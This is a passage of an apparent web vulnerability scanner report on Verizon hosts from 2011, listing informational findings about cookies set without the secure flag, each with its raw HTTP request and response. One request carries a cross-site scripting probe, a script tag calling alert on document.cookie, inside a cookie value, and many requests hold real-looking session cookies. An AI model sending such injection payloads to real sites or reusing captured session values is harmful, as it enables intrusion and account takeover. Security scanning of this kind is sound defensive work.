Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 133
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "85-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7141
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

GIF89a....    .............DDD...UUU...........................!.....    .,.........20.@k.)..;......a..\a....hP.....1t)..%.....I..X....;

6.37. https://enterprisecenter.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: /enterprisesolutions/Default/favicon.ico
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


6.38. https://mblogin.verizonwireless.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mblogin.verizonwireless.com
Path:   /amserver/UI/Login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:31 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-11
Am_client_type: genericHTML
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close
Content-Length: 18685


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/j
...[SNIP]...

6.39. https://signin.verizon.com/sso/VOLPortalLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:35:49 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: lob=consumer; domain=.verizon.com; path=/
Set-Cookie: dotcomsid=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: logout_url=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Location: https://signin.verizon.com/sso/RememberMeServlet
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 291

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://signin.verizon.com/sso/Rem
...[SNIP]...

6.40. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Ver
...[SNIP]...

6.41. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...

6.42. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 31774
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Verizon | Shop for Services | TV + Internet + Phone</title>
   <meta na
...[SNIP]...

6.43. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 0
Expires: Mon, 05 Sep 2011 22:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:02 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com


6.44. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; 